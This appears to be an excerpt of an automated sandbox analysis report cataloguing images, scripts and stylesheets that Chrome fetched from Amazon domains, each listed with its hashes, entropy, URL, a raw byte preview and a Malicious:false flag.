                                                                                                                                                                                                                                                                SHA1:D9C5945B48E04C9E5CEEAE97851B3B8259F85956
                                                                                                                                                                                                                                                                SHA-256:AE2BE6C7E77EC1E0490D5DD7CC2DD64EC7F0BB7C1793890CD56AA0EF3860D99D
                                                                                                                                                                                                                                                                SHA-512:B06A69B39A59C4B386B2ADF09F45AC180E67A3FF61844D208424990E5E4A7BBAF2831EA77262217EA68C81EB4985C5FB201F2714516F0D89AB17A015B959CA69
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..................................................................!1AQ."aq...RS....#2r...$3CUb...................................................!..134Qq...."A..Ba.............?..."q.........................................wlzqk..l....,..<...xEa.A2\8=.Z........r.Q....A._Y......D...C.Vn.:..Z.?`..3.......k.ed.U.H..d..<J.^...9...p(...wW.S~:.W.u..L...6...C.......f..F...'@.....$.]N.U-.CU...{..L;.:.......?Mu.l/6........-.....V_.-.;.``.Z...ZU..K{1....../..<".A....f.vUQ....H.oE....G...LM.....YCr.h.m.....'...Q/..y<.J_>.e...b...UC.2..T.{<..R..L4.l..LsX..,....8.K."&#L..................Yx.c.....2.*..H..%.+?....#......?.....qvU....9Ks.4.>....~S.;.C.).z..Oo7..3....1.0*{.s.r.(.....!X...Z..K...k.}J..g..vB/.H..Q;].U/..X....BA_.Z}0...X.....Q}.....)6..4.V._..].;..S.......=E9>g.P..2..........w......}...s..Du..y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):119435
                                                                                                                                                                                                                                                                Entropy (8bit):5.310726578286396
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:zdYvqPLlRf9SVENCDQ6/vZMYAtCYw/dU4+ruUrrXVzOetY+YCG92G:evef9SVENCk6/8CYwS4urXVzVNG
                                                                                                                                                                                                                                                                MD5:47B144E02567BC5C6BC2F7E048E8F26E
                                                                                                                                                                                                                                                                SHA1:9BA12ECD4B5C1E79C8EFB4B132A7E785C4745EE7
                                                                                                                                                                                                                                                                SHA-256:6EB4B1AB4FFBCB4172E4A0F3DDBD68F8B896671496820AD5749D21204A34C69A
                                                                                                                                                                                                                                                                SHA-512:87843E2807D4A3DB2D63F9A2F6FE82AAAABBC8A62141DC47A919865844B2421C382007266069BBCF69ABC7606F87B0C62ACC42CC41A8718CE1C99EE2C2B948DB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/21ZMwVh4T0L._RC%7C21OJDARBhQL.js,218GJg15I8L.js,31lucpmF4CL.js,2119M3Ks9rL.js,61p+cK5jpzL.js_.js?AUIClients/AuthenticationPortalAssets&BS5ThWEP"
                                                                                                                                                                                                                                                                Preview:(function(f){var g=window.AmazonUIPageJS||window.P,h=g._namespace||g.attributeErrors,e=h?h("JQueryUI_Core_AUIBuild",""):g;e.guardFatal?e.guardFatal(f)(e,window):e.execute(function(){f(e,window)})})(function(f,g,h){f.when("jQuery").register("jQueryUI-core",function(e){(function(b,e){function f(a,c){var d=a.nodeName.toLowerCase();if("area"===d){c=a.parentNode;d=c.name;if(!a.href||!d||"map"!==c.nodeName.toLowerCase())return!1;a=b("img[usemap\x3d#"+d+"]")[0];return!!a&&g(a)}return(/input|select|textarea|button|object/.test(d)?.!a.disabled:"a"===d?a.href||c:c)&&g(a)}function g(a){return b.expr.filters.visible(a)&&!b(a).parents().addBack().filter(function(){return"hidden"===b.css(this,"visibility")}).length}var h=0,k=/^ui-id-\d+$/;b.ui=b.ui||{};b.extend(b.ui,{version:"1.10.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_U
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 103x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4819
                                                                                                                                                                                                                                                                Entropy (8bit):7.919927298406657
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TKKviPbAjSyzVf958TM1GFCqB66AT/N+JW84lUClS5XVSEqLtYsTLMvFH27Fg89n:f1jSo952M1qkXRAt4+ZXVSEPsTLMNqFF
                                                                                                                                                                                                                                                                MD5:91492F6603032C6395C645E064CAE47A
                                                                                                                                                                                                                                                                SHA1:58874C21477ABA2ECCDB56FB2C34C2176AE3088F
                                                                                                                                                                                                                                                                SHA-256:74CC21D3D386DF71FAA4C0B4213E4D4FF61AE23156A59E9DD99DDD9351C53329
                                                                                                                                                                                                                                                                SHA-512:D8EF3865E9FEBE961C3D3F21893C3AD12B2F6035F6FB681B0B4EB7E66F3F92233C82F0BA5E21AFEA825B129F735F3190AABC5CD55497CD69D62D4A0D4A8BF4E7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61xur6u9CKL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........g.."................................................................!1.."A.Qa.26Bq.......Rrsu..#34t.......5S...Ub.....................................................!1."..#AQ..2aq................?..t.(.)J.JT_..zN...^...,V.#|....J3. ..P.o.>..u]Y4.%..e!B fI.n..*....{.:...r8w..n-5_....0.:.;(....t..<-........0.?..`!.y....V...m2J.pY.H..l....=DP..^...][.|.}._../.A.L.j..Oy? =..WC..}.P./.`....n.[...!..n8.I....5E.-2..v..X......+...if..@....<..;.y...G./..ubW.f..:..,u.5-..........bR.A...>...s.r...A.......R......)@+Uz@.pf....y...j.HO.z......4.?n..3.g.Y...]....K....[Y..../E..l...l.y=.........0If.UF.bN.Q.[:#.Ke........{..*...<....FNX..W.....|:...c....p.i.v..0.'.........wn.Z.8.W.5Cauw.....p.\L.$...\rJ.M..4.<..%...+....:|@.......%.`>..n........(....Pd.Z..M..+w....e.K.r..R.~..d..Z{.+ug.....|.......3....Z.<~...W
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (30956)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):31002
                                                                                                                                                                                                                                                                Entropy (8bit):5.263859562616461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:HkhQ+LMasRxY7xky/1VXYmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUhBGP95xD:AQms7kx9E4Ok2rKLP9
                                                                                                                                                                                                                                                                MD5:055C05372F5DFC6548345AC9EEAE6E31
                                                                                                                                                                                                                                                                SHA1:81AE805B0ACE186FEDAFFB681415144B73860388
                                                                                                                                                                                                                                                                SHA-256:7D14FAAF807F0DECFDF513F91AAD06F18704B4DE223201E16A638F42F91DEED9
                                                                                                                                                                                                                                                                SHA-512:E37106F6CA36CAFBF3041466F14DEA1E89C0CF7788E1536A0B82DB4D39BF15BE538FE5E793AE119AF813F75AE7DEFD68BB8D3E0832D992181CAAA089C4D57CD8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js
                                                                                                                                                                                                                                                                Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const C=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},M={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},x={playingTime:()=>(y=y||0,y)},E=()=>C,P=()=>x,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7924
                                                                                                                                                                                                                                                                Entropy (8bit):7.931629490685156
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:rpmfzfEaXCZ1HM8YvQLoufJonsZLcnMCXuisY8iZYrMylXzfJ9x:r0fzLIsXohTAnMCXMYDYYyT9x
                                                                                                                                                                                                                                                                MD5:FF9D98E304B477989AA302BCC6FC56A8
                                                                                                                                                                                                                                                                SHA1:D665848692490FB5325309A69148806026D06FD2
                                                                                                                                                                                                                                                                SHA-256:DECFAB4142B03DDC98931943370B4D88B9DC3C49E12C69D874698F680067C490
                                                                                                                                                                                                                                                                SHA-512:CBF92BF5B68340B0F4B2F238BA0B7245749DE432E5773A8137ED95B670A98CC351946A991F6CD4FE040B13CCF6E5B606964CB94E1EDF22AB338B7DE2E9696F44
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71dwE8Ob46L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."............................................................!..1."A.Q.2aq.B.#.....R....$CTb......3S................................................!1.."A..#2Q..Bq.............?..])J.JR.R....(.)J.JR.R.w..1..I.....u.!1.>.H..+R.F.}.../....2=...r[.\!r....b6FoQa5'.n.G...^..Up[.iIgn..w.~"t..v.6..s..e........Qu.P...>.s/...V....&.V+.C...ZX2.]..:.I.......Fc.N...V.|..../..G.u..XK...%.i...p..y.*M~.t.Rj.so.?.r.o..]pD..L.....G.7_.1k...'...p..........0...O]..H.z._.....d"....0|`.o:O./Oj.TkU.O.eD{.(AQ:f.Dn...R.i...(.,..7..2........)@)JP.R......)@)JP.R......)@E.\i...3..p3.bkQ.k.jqq..F...>....[.S~y.?..h^k...d..7..e.m.........#.mn%......0..*uSU..{Di.y.....l..3.V.D.....!..3..Mqb.Y.om...5..pS..;.V.....vPDV...@.=N7_....&..|H.....{...#-u1.......U..g.V..$.-.7.~..].\.2V.....`I...$.m"e.(.v._Q.[.ze.^.e.@.&.g'....(....0Z
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2649
                                                                                                                                                                                                                                                                Entropy (8bit):7.802966138392855
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rmQc1jbaUkoEwLaUOxTlTcrL3iYwrcOWmcViY2u2QMsscyEKFf:TFt7EwLajxtMuYmcOzxu2QMWK5
                                                                                                                                                                                                                                                                MD5:49B8BA12EA2FD2FCB8CDE5CEB044255D
                                                                                                                                                                                                                                                                SHA1:8C6534745142D6C4F4A1F9A7DCC6AF1EC2DA389B
                                                                                                                                                                                                                                                                SHA-256:C9B1E0CB1BE75194CA37F22F383DD8D515153B8BC13C288595A112E6DCC7A292
                                                                                                                                                                                                                                                                SHA-512:F000E323A2793EB54FCDF0284326CEA080E45161BD83166737AB1AF4D16EDC63D328B8436E8C00EF036680FDFB2013B3F5DCA0C7B4148D512998A11F2E87A2F4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!Aq..."12Qa.4BSr....$3R......%6Dbtu.................................................1."2ABCQ............?...." "'.......qN..9.76...w.1...7..X......q.c......n...=....$E....t..}.q..K..~.m..y..q...i9........v.bw%.....zg.h.....3m.M...9=.-D.?.-.4.D..{.........6...""." ""." ~=.J..o.Z.6...;}.f.\]et.8....Q..C....,.....K..V.K.&5.}q.......<.rr..M.3..e.].v.K.+.r..U.j.G...t."..Y.|{+]......"O\...=.............Uk(...U....V..F......7h............#"..l....z|.j....m...0.~G..V'..............<Qb..~..6.....i.W...0p.V..l...s....]Kr.d-..'>.j.......{]=.....g..U/oE..v}..fIh|)...u.9Z..Z....z..^.}._U...\=...;U.Gp...x..m..j.:..np...9a*...m.).qJ.)-.".Z.ns..L.\..m2..m..;.....>..i..+0.....&.fY[w^q.5$D@DD.D@DD...fy..vG...M6..Vc:.>e.`...X....Z.....N
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3319
                                                                                                                                                                                                                                                                Entropy (8bit):7.835380914532241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T/rzbBpbF0De6++kB/tNQ6j7bN4vB0bbbX:vzbfTFHDNQ6j7bNgB0bbbX
                                                                                                                                                                                                                                                                MD5:F0FF3BFB984E128C08837677EA760307
                                                                                                                                                                                                                                                                SHA1:3BBD14E0E396E9C792CA7E979A6B5F23D0E158DD
                                                                                                                                                                                                                                                                SHA-256:7A56387162F38A5527153601D23BB7D0125E0D8C0D2304976BAAF93E43BC2157
                                                                                                                                                                                                                                                                SHA-512:7274AE5052F8EAD0B2C36C0DB0552276D2CE74B6FC51098FCC0AD1A69ECD5D13B66DF8A22F6BA12A4986928B886908D905E84BD22C04335FD46025052B50AD6F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........|....................................................1..!AQ..aq.."2Bb3c....#Rr....CS...................................................?..D@DD.D@DD.D@DD.D@D....oO+c.\....o.@D..g....g .8..-..s..C... c. ..f.+..Shg.Y...E...y?...}. .H...;0..+...d...k.o.W..,A............................Eb....f..5s.^..%j.u..>.d.S.VU.!....~.q.2..,[S.7.w.s.p./.5...f.jq...S$.Q...yc....3...W.Q&..>.'.....V.....B.bv.v...ZUm'.U...T..w/=-#%..p........>E.Z..M_.J.?.....J.jU..y..a...... .C..v..eu.fi....%0.j'..c..>..".....;...3d..,.;......i..#.....o..Z.)L.s..1..q..6./a<.[.9H8 ..Km...4.t..E3..<q................h...&.....k.G<.I5{...qA.....`.Mq....7..>CR...^...S2j.&n7.r.Z...$3TH..u{.^..IT;..Gz./p.1o....Bf...j...j7..].]k...Q..\....AZY.....J.D..5*..K.....[.*.. .f\.}.V!.z..O%.}.....s......I+....]C.v)...3[./e`s.g...;-.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5432), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5432
                                                                                                                                                                                                                                                                Entropy (8bit):5.075526870751628
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/Sm/593ZjXRm1Tmbvn3M9UqCuvWfhX27+jW:/XZRmYbk9+hX2KjW
                                                                                                                                                                                                                                                                MD5:368CE33EB4A123589EDF22909A5DA403
                                                                                                                                                                                                                                                                SHA1:A45C394E67A4B9B24A041709A9EE93887EA70011
                                                                                                                                                                                                                                                                SHA-256:14A51947C7E59E5FB51284DF59673595073D9A07243D664F82B904B10ECBFF4B
                                                                                                                                                                                                                                                                SHA-512:25D2E3AB05518860AA40DA27B9DDF34F6CF012D1EB44FAD6D0A6EFC7388DE3DB253B60B473F233A11593D6133853601EAEE0F2EEA37D113BBE17FFC6ED98A275
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/21cwI2AAWQL.css?AUIClients/CVFAssets
                                                                                                                                                                                                                                                                Preview:.cvf-account-information-box-profile-image{border-radius:50%;height:33.33px;width:33.33px}.cvf-account-information-box-profile-details-padding{padding-left:10px}.cvf-account-switcher-add-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/Pq46CmXZMTyTAdQ.png);background-size:contain}.cvf-account-switcher-add-account-icon-v2{background-image:url(https://m.media-amazon.com/images/S/sash/zM47PAGmHg9UEN-.png);background-size:contain}.cvf-account-switcher-personal-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/ES3wBGFTd2QLjwc.png);background-size:contain;background-repeat:no-repeat}.cvf-account-switcher-business-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/wZEwSHH87jmThSc.png);background-size:contain;background-repeat:no-repeat}.cvf-account-switcher-check-mark-icon{background-image:url(https://m.media-amazon.com/images/S/sash/bFjL-3p8JvQ2T9J.png);background-size:contain;width:50px;height:50px;background-repeat:
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 400 x 750, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):27972
                                                                                                                                                                                                                                                                Entropy (8bit):7.9746563718982335
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:PYh3ZcLbZnL3Azzh2/99/KL6sFxvjCENS:A8397Afhgjq6yv9NS
                                                                                                                                                                                                                                                                MD5:1B5A1FB097715B1604B21ABA92EF6A3E
                                                                                                                                                                                                                                                                SHA1:C4A765AEDD886DC04D89E7E93B6A02C59ECB7013
                                                                                                                                                                                                                                                                SHA-256:437E95A363A4291060E34BA170E043274E0155821E9BE374F35DE3C4F13CBAA5
                                                                                                                                                                                                                                                                SHA-512:0DD02CB398A22092732CFAE2B141F5327360A42E931AFD27AAF8EAE402C8C36EF0BB5EDEA82EB39E66567DAED1CAA79B70CA4BF41D30387653563D0A78AB9B0E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/mPGmT0r6IeTyIee.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................PLTE...*AC.38.'0")0!*"NT[......333............dim/8@/8A`goWVS. !...QV\...bejeee>AC......[bj}..PW`YtS............mwxjpv...MSY`fi;=@KR[......_di......djr....................................V]e...u....8,3..!..2..:...u..v....=?A,..j.......8...m.02.u..@).ojBGL0....."....8>D.n...2..9;=.>/..B..[........@@A.v......D4.)."..J.B? ..H..432...\.[..:H..#)-....* ...............................B.......................#......G.......P..J..:.................B..9..int.s..d.5g....I..9..I..jqwqz}.]I.. ..D.....E..$.......T....]...=..............cgk.....L...t.vm.OM.+......+.g...#........'..Q.ZY.%.f@.y................................P.1..<...N./..>......................s.i...P.........}...y...........;..;.F5.G6........%.............(Z"....tRNS............*......<.......{...%Zk.I....F~.....................*..Z<.......]...t..}.`'......h.....;....{..K..........L......^..e....B.*b.|..............d.....O....................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8804
                                                                                                                                                                                                                                                                Entropy (8bit):7.954378552361891
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:RPG6fcVwKOGI1eyVyqlr+zbigrliVPdgwHI3P8O:g5yD/VyqB0blrQVP2N3kO
                                                                                                                                                                                                                                                                MD5:F445A766CBAB21B560E45A74902165D1
                                                                                                                                                                                                                                                                SHA1:1C717BDD7621E75BB2B811A9279D981F5F373049
                                                                                                                                                                                                                                                                SHA-256:1C0FFC70426100D590DE3905DBB62088DB3A479E80CB0414CE362BD28465A846
                                                                                                                                                                                                                                                                SHA-512:F9EAE55F6A7D43F3D638B47A8B09B9D184A301184BC9E4F3563E8A17A517458279FF8F5A98F5B66B1D4149AF26D1787B7FF52971FA8297C8D4605D3878ABB91D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1A.."Qaq...#2B......Rbr....34.$s.S.CDc...................................................!1..AQ2."a.q.#3B..............?....(...(...(...(.....9.\.......Z..J)#...D.^.r>../lxn.J[.Q...K$OV<\.QU..{5..v....\......>....4.DZ........b=.G.......n.u..y...4<...G=..]...........bo.....y#2D=...}0....K.........q......._;e2.....2y..e..O.7..N.T.Nv.....U..=..lTVE.Ij..\.\.Q.Z&~C....W>G..)......\..N._......6...v........N.m...q.v.]..&.....\.R,aE~#....z...PQE..QE..QE....O.=..0"...#L.U.. ..5...]....P..kVL..'T..:......T..*..pv..4Ht e....$:Wp...).....1Z...(I....L.UI.....d.LW..$......ZRj.......`...FIY....4.H......xr..U.4g...1..v.../.- ...nQ.+Z@.h..J...=ArU..)....;Ty/.`.^X.|~.,h......nd..m{e6.23......!..~F..1...Hunx.#. .../;a-.E4...l..D.. ?R8..<...m..=.:...z.$9..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24067
                                                                                                                                                                                                                                                                Entropy (8bit):7.957278708964272
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:rM4Bko+aaBIfK9tdXMd3AzDAie518bVPEsQTBAxlfWdwXaBnoFX7:rMdayA3KDAlA+pTBAxA1ZoZ
                                                                                                                                                                                                                                                                MD5:A98AE52C82C151DE50E2C82793350FAD
                                                                                                                                                                                                                                                                SHA1:1FFFC8481CE920EA1256396A0CE1D1CB95BA0E8A
                                                                                                                                                                                                                                                                SHA-256:939B67E8F5792ABF8D262FE6701606ADD65A27B348B63F43458FAAAA4E3F43D0
                                                                                                                                                                                                                                                                SHA-512:8B4135B5A4D8F86F342EDE779BC1F0AE548D84C76F12D7AED2EDFDB4E6683ECE80C6877E77AA09FCDF7BC22081A64A0984D30E0572A883DF8766424287DA898F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................X....................................................................................................FI6<[K.D...s=^..o.VT1..S_'................................).....9..T.07..2.m$.F}...............2...............*9...J..u...j..^)v.....}......6..YtY>H...........8..&..........7..S...........Y.@....................A.^w..?.K....Oq..]...z..g...F..vt..+.R..u...4.o.;Q.z.J.........O....=m..x.......<...k.+....e).d.^...ex... K!^E.Iw#..h,d|H.~]...~..>........K...b.........p.\^.O..Y.#4moO5.c..}..y....5.^.}.?I.c.?w..'..Z..y.j.!..v.O..[......_;......).W.<..G#.l.O...e-|...'.8...z....#|a{.Ye_g...7.....M...P...!^zFQ!. .5{hc.r.S.Z....N.K.F.&.-......d.mx.z.+p.._...&.$....^.O.DZ9!..;.t.G...:v.u..V7.G=.u.r.D&.y..m....#[.#.z.i_M...R.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):37419
                                                                                                                                                                                                                                                                Entropy (8bit):7.937127031508407
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:8o5vu1HQZYJ6tT20eEseZDurX/U7+Y9eYe7axwIlR9q:hmK/lseZDu7UmYe7aSWRU
                                                                                                                                                                                                                                                                MD5:C2B2663B7B307CCF7E78A827952EE635
                                                                                                                                                                                                                                                                SHA1:A8895D0213035F00116B792274F7AB66B7DC6BAF
                                                                                                                                                                                                                                                                SHA-256:1B1EE3D875ABFA85284B12CC7F1DE4F265E16E45C8F7A7C385FD1C2551C2F23A
                                                                                                                                                                                                                                                                SHA-512:1E5B0A2A21FEF7C1F261DA3BB534974B2BA5AA48E5FDB4C54E33A4366EA02CE3AABF65532E5F700188800ACB66267C1ABEF64C3C3D115AFEBD2D46C4A8D1942F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/51YnNha37vL._SX1500_.jpg
